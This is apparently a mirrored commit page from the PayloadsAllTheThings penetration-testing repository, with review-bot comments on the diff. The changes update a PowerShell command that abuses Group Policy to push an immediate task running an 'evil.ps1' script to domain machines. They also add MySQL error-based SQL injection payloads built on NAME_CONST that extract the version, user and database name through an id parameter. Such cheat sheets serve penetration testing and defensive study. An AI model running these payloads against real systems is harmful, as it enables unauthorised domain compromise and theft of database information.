mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 23:02:46 +00:00
Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings
commit
27768783ff
2 changed files with 11 additions and 2 deletions
|
@ -1056,7 +1056,7 @@ PS> Add-UserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity
|
||||||
PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO'
|
PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO'
|
||||||
|
|
||||||
# Create an immediate task
|
# Create an immediate task
|
||||||
PS> Add-UserTask/Add-ComputerTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator
|
PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator -Scope Computer/User -GPOIdentity 'SuperSecureGPO'
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Abuse GPO with pyGPOAbuse
|
#### Abuse GPO with pyGPOAbuse
|
||||||
|
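Review bot: `-Scope Computer/User` on the new `Add-GPOImmediateTask` line is slash shorthand for two alternatives, but inside a copyable command it reads as a single literal value. The unchanged `Add-ComputerScript/Add-UserScript` line above uses the same shorthand in the cmdlet name, so the block now mixes two kinds of slash alternative. Suggest one command line per scope, or a comment saying that one value is to be chosen. Since the cmdlet name changes in this hunk, the `# Create an immediate task` comment could also name the module the cmdlet comes from.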
@ -3399,4 +3399,3 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||||
* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints)
|
* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints)
|
||||||
* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing)
|
* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing)
|
||||||
* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
|
* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
|
||||||
* [WebDAV, NTLM & Responder - Didier Stevens - Monday 20 May 2019](https://blog.didierstevens.com/2019/05/20/webdav-ntlm-responder/)
|
|
|
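Review bot: the `WebDAV, NTLM & Responder - Didier Stevens` entry is dropped from the end of the references list, and the merge commit message gives no reason for it. Check that no section of the file still relies on that source. If the entry was a duplicate or was moved elsewhere, say so in the commit message; otherwise keep it.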
@ -220,6 +220,16 @@ Works with `MySQL >= 5.1`
|
||||||
?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))--
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### MYSQL Error Based - NAME_CONST function (only for constants)
|
||||||
|
|
||||||
|
Works with `MySQL >= 5.0`
|
||||||
|
|
||||||
|
```sql
|
||||||
|
?id=1 AND (SELECT * FROM (SELECT NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--
|
||||||
|
?id=1 AND (SELECT * FROM (SELECT NAME_CONST(user(),1),NAME_CONST(user(),1)) as x)--
|
||||||
|
?id=1 AND (SELECT * FROM (SELECT NAME_CONST(database(),1),NAME_CONST(database(),1)) as x)--
|
||||||
|
```
|
||||||
|
|
||||||
## MYSQL Blind
|
## MYSQL Blind
|
||||||
|
|
||||||
### MYSQL Blind with substring equivalent
|
### MYSQL Blind with substring equivalent
|
||||||
|
|
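Review bot: the new heading `### MYSQL Error Based - NAME_CONST function (only for constants)` states a limitation that none of the added lines explain, and the "Works with MySQL >= 5.0" line is given without a source. Suggest adding one sentence on what "only for constants" restricts, plus a reference for the version bound. The added fence is tagged `sql` although each of its lines starts with the `?id=1` query-string prefix, so it is worth checking that the tag matches how the neighbouring blocks in this file are fenced.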